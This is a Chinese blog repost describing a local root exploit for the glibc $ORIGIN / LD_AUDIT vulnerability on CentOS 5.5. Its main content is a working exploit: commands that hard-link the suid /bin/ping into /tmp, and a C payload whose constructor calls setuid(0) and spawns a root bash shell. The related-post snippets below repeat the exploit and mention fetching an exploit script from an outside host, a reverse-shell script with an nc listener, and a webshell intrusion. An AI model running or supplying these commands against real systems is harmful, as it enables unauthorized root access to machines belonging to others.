利用Glibc库-ORIGIN-提权

最新推荐文章于 2022-07-08 22:31:42 发布
最新推荐文章于 2022-07-08 22:31:42 发布
阅读量294 收藏
点赞数
文章标签: python 开发工具
原文链接:https://my.oschina.net/fsxchen/blog/135730
版权

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

实验环境:centos5.5
原理:在Linux中,/tmp的权限是777,利用suid,
将一个带有suid权限的执行文件/bin/ping  硬链到/tmp的文件


cd /tmp/
mkdir exploit
ln /bin/ping /tmp/exploit/target
exec 3< /tmp/exploit/target 
rm -fr /tmp/exploit/
gcc -w -fPIC -shared -o /tmp/exploit payload.c
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3


vim /tmp/payload.c
void __attribute__((constructor)) init()
{
        setuid(0);
        system("/bin/bash");
}

转载于:https://my.oschina.net/fsxchen/blog/135730

Linux????? Mr.Liyz
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
基于GNU glibc动态连接
weixin_34024034的博客
01-04 147
编写这样一个脚本, mkdir/tmp/exploitln/bin/ping/tmp/exploit/targetexec3</tmp/exploit/targetrm-rf/tmp/exploitcat>>/tmp/payload.c<<EOFvoid__attribute__((constructor))...
glibc $ORIGIN 本地升漏洞
weixin_33777877的博客
11-29 195
#useradd hx10 #su - hx10 [akin@Centos5 ~]$ wget http://autosetup1.googlecode.com/files/glibc-exp.sh --2010-08-03 01:09:19-- http://autosetup1.googlecode.com/files/glibc-exp.sh Resolvin...
glibc溢出CVE-2018-1000001总结
weixin_34378045的博客
04-22 384
遇到了好几个centos6.5,一直尝试想。暂未成功,靶机内核:2.6.32-696.18.7.el6.x86_64。glibc版本:ldd (GNU libc) 2.12目前编译过程中都发现很多坑。最开始编译报错,指定gcc路径/usr/bin/gcc,指定std为c99,使用-std=c99,还需要加-lrt/usr/bin/gcc -o RationalLove RationalLove...
c语言,教程:GNU C library动态链接区$ORIGIN溢出
weixin_36048512的博客
05-19 316
摘要利用tmp目录限、suid 限和C语言使普通帐号为ROOT限合适用 RHEL5-RHEL6 CENTOS5-CENTOS6 均可以方法[moonsec@localhosttmp]$ mkdir /tmp/exploit[moonsec@localhosttmp]$ ln /bin/ping /tmp/exploit/target[moonsec@localhosttmp]$ ...
20210414web渗透学习之GNU C library 动态链接区 $ORIGIN 溢出(胃肠炎住院期间)
qq_45290991的博客
04-14 256
GNU C library dynamic linker $ORIGIN expansion Vulnerability from: http://marc.info/?l=full-disclosure&m=128739684614072&w=2 动态链接器(或动态加载器)是为连接运行时负责动态链接程序。 ld.so运行在两个安全模式,一个是宽松模式,使超过负荷运行控制程度高,一个是安全模式(libc_enable_secure)旨在防止用户的干扰装载特可执行文件。 ...
glibc-2.17-260.zip
09-26
glibc-2.17-260.el7.x86_64 glibc-common-2.17-260.el7.x86_64 glibc-devel-2.17-260.el7.x86_64 glibc-headers-2.17-260.el7.x86_64
glibc-ports-2.12.1.tar.gz
07-16
glibc-ports-2.12.1.tar.gz:glibc版本升级的关键步骤与相关知识详解》 在Linux系统中,glibc(GNU C Library)是核心的组件之一,它供了C语言编程所需的接口,包括标准I/O、字符串处理、内存管理等多个功能...
CentOS下glibc-2.17离线安装rpm包
07-18
CentOS7下glibc离线安装rpm包,安装方式,解压上传到...rpm -ivh glibc-headers-2.17-307.el7.1.x86_64.rpm rpm -ivh glibc-devel-2.17-307.el7.1.x86_64.rpm rpm -ivh nss-softokn-freebl-3.44.0-8.el7_7.x86_64.rpm
glibc-common-2.17-317.el7.x86_64.rpm
07-06
glibc-common-2.17-317
mysql-8.0.26-linux-glibc2.12-x86_64.tar.xz
09-09
MySQL数据Linux - Generic版本:mysql-8.0.26-linux-glibc2.12-x86_64.tar.xz 适用于:Linux - Generic (glibc 2.12) (x86, 64-bit), Compressed TAR Archive
Linux第三篇-GNU C Library动态链接$ORIGIN溢出
Love&Share
11-19 1655
文章目录GNU C Library动态链接$ORIGIN溢出推荐阅读 GNU C Library动态链接$ORIGIN溢出 利用tmp目录限、suid限和c语言是普通账号为root限 适合RHEL5-RHEL6 Centos5-Centos6系统 靶机环境: centos5.5 新建普通用户 useradd ocean passwd ocean su ocean 创建目录 mkdir /tmp/exp ln /bin/ping /tmp/exp/target .
linux2.6内核本地,低限获取root
weixin_33827590的博客
06-20 419
前言:额、一台linux 服务器PHP 版本太低。。需要升级才能使用ThinkPHP框架,可是我没有root密码,无法升级,虽然是在虚拟集群中的服务器,但是也没有集群的密码,如果直接用修改启动项方式去修改root密码的话,1是太麻烦,2是额、技术含量也太低 。。经过一番百度、Google,发现2.6的内核有一个漏洞, N次失败之后终于找到一能用的神器。操作过程如下。。 ...
lunix入侵别人电脑_记录一次Linux的实战入侵过程
weixin_34207964的博客
12-24 1327
注:本人是个菜鸟。一、利用文件上传漏洞获取webshell。确定要攻击的目标网站。图上的目标站域名过期了,只能通过ip地址访问。大概在去年的时候,对目标站实施了入侵,具体如下:本想着通过sql注入的方式方式爆出用户密码,通过sqlmap扫描注入发现没有注入点,但但得到了数据是mysql。后来想着干脆自己去目标站注册一个账户。当然用户信息肯定是随便填的。登录成功之后发现我登录的用户有头像上传功能。...
glibc更新
weixin_33782386的博客
08-01 77
2019独角兽企业重金招聘Python工程师标准>>> ...
Linux————利用SUID
热门推荐
Fly_鹏程万里
05-23 2万+
bgvfdcfhjmkjnhb
weixin_34342992的博客
02-11 70
http://seclists.org/fulldisclosure/2010/Oct/257 # Create a directory in /tmp we can control.$ mkdir /tmp/exploit # Link to an suid binary, thus changing the definition of $ORIGIN.$ ...
119.网络安全渗透测试—[升篇17]—[CentOS5.5 GNU C library 动态链接区 $ORIGIN 溢出]
qwsn
07-08 1987
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 利用tmp目录限、suid 限和C语言使普通帐号为ROOT限[root@localhost ~]# [root@localhost ~]# [root@localhost ~]# [demo1@localhost tmp]$ #创建目录 [demo1@localhost tmp]$ #创建target文件硬链接 [demo1@localhost tmp]$ #把target文件加载到内存中 [de
linux溢出(适合刚学习linux的朋友)
fengling132的专栏
03-31 2434
本帖最后由 wjs 于 2010-4-3 14:26 编辑  作者wjs qq 825680101 我也是刚接触linux,谢谢师傅sunwear的指导。 先在网站目录上传1.pl,是个反弹脚本 Phpshell执行chmod +x 1.pl,给1.pl执行限,图0 然后执行 ./1.pl 本机IP 1224 然后本机监听nc -vv -l -p
Linux Glibc幽灵漏洞允许黑客远程获取系统
康林工作室
01-29 4722
幽灵漏洞是Linux glibc上出现的一个严重的安全问题,他可以让攻击者在不了解系统的任何情况下远程获取操作系统的控制限。目前他的CVE编号为CVE-2015-0235。 什么是glibc glibc是GNU发布的libc,即c运行glibc是linux系统中最底层的api,几乎其它任何运行都会依赖于glibcglibc除了封装linux操作系统所供的系统服务外,它本身也

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值